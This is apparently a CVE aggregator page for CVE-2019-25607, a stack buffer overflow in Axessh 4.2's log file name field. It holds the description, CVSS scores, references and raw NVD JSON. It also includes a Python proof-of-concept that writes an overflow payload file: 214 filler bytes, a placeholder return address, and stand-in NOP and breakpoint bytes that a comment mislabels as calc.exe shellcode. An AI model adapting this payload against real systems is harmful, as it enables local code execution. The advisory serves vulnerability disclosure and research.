CVE-2019-25607

Description

Axessh 4.2 contains a stack-based buffer overflow vulnerability in the log file name field that allows local attackers to execute arbitrary code by supplying an excessively long filename. Attackers can overflow the buffer at offset 214 bytes to overwrite the instruction pointer and execute shellcode with system privileges.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Axessh 4.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys
import struct

# Vulnerable Offset to overwrite EIP
offset = 214
# Example JMP ESP address (Needs adjustment for specific binary version)
ret_addr = struct.pack('<L', 0x77F8A123) 
# Simple calc.exe shellcode (Example)
shellcode = b"\x90" * 32 + b"\xCC" * 50 

# Construct payload
payload = b"A" * offset
payload += ret_addr
payload += shellcode
payload += b"C" * (1000 - len(payload))

try:
    with open("malicious_log.conf", "wb") as f:
        f.write(payload)
    print("[+] Malicious file generated.")
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25607
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25607
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25607/
[4] VulDB https://vuldb.com/cve/CVE-2019-25607
[5] http://www.labf.com
[6] http://www.labf.com/download/axessh.exe
[7] https://www.exploit-db.com/exploits/46858
[8] https://www.exploit-db.com/exploits/46922
[9] https://www.exploit-db.com/shellcodes/46281
[10] https://www.vulncheck.com/advisories/axessh-local-stack-based-buffer-overflow-via-log-file-name

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25607", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:28.620", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Axessh 4.2 contains a stack-based buffer overflow vulnerability in the log file name field that allows local attackers to execute arbitrary code by supplying an excessively long filename. Attackers can overflow the buffer at offset 214 bytes to overwrite the instruction pointer and execute shellcode with system privileges."}, {"lang": "es", "value": "Axessh 4.2 contiene una vulnerabilidad de desbordamiento de búfer basado en pila en el campo del nombre del archivo de registro que permite a atacantes locales ejecutar código arbitrario al proporcionar un nombre de archivo excesivamente largo. Los atacantes pueden desbordar el búfer en el desplazamiento de 214 bytes para sobrescribir el puntero de instrucción y ejecutar shellcode con privilegios de sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "http://www.labf.com", "source": "[email protected]"}, {"url": "http://www.labf.com/download/axessh.exe", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46858", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46922", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/shellcodes/46281", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/axessh-local-stack-based-buffer-overflow-via-log-file-name", "source": "[email protected]"}]}}